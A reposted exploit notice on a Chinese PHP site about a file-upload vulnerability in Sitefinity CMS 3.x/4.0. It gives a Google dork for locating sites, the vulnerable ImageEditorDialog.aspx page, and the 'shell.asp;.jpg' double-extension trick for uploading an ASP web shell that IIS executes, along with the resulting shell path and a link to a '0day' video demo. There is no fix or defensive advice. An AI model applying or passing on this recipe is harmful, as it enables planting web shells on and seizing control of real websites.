文章详情

Php文档 Php问答 行业资讯 Php论坛 Php手册 Php博客
  • 游戏榜单
  • 软件榜单
关闭导航
热搜榜
热门下载
热门标签
关闭搜索
php爱好者> php文档>Sitefinity CMS (ASP.NET)上传漏洞

Sitefinity CMS (ASP.NET)上传漏洞

时间:2010-11-18  来源:Net.Edit0r

发布日期:2010-11.18
发布作者:Net.Edit0r

影响版本:3.x . 4.0
官方地址:http://www.sitefinity.com

漏洞类型:上传漏洞
漏洞描述:Sitefinity CMS 图片上传未严格过滤文件名,导致shell.asp;.jpg畸形文件利用IIS解析获取网站shell。

 

Google dork : "Sitefinity: Login"

exploit # /UserControls/Dialogs/ImageEditorDialog.aspx

 

first go to # http://site.com/sitefinity/

 

上传调用页面then # http://site.com/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx

 

选择要上传的文件select # asp renamed via the .asp;.jpg (shell.asp;.jpg)

 

shell上传路径Upload to # http://site.com/Images/[shell]

 

 

视频演示Video : http://net-edit0r.persiangig.com/Film/0day.rar
 

 

标签分类: 上传漏洞 文件上传

相关阅读 更多 +
排行榜 更多 +
瓢虫少女

瓢虫少女

飞行射击 下载
潜艇鱼雷

潜艇鱼雷

飞行射击 下载
网络掠夺者

网络掠夺者

飞行射击 下载

Copyright 2006-2020 (phpxiu.com) All Rights Reserved.

本站为非盈利性网站,不接受任何广告。php爱好者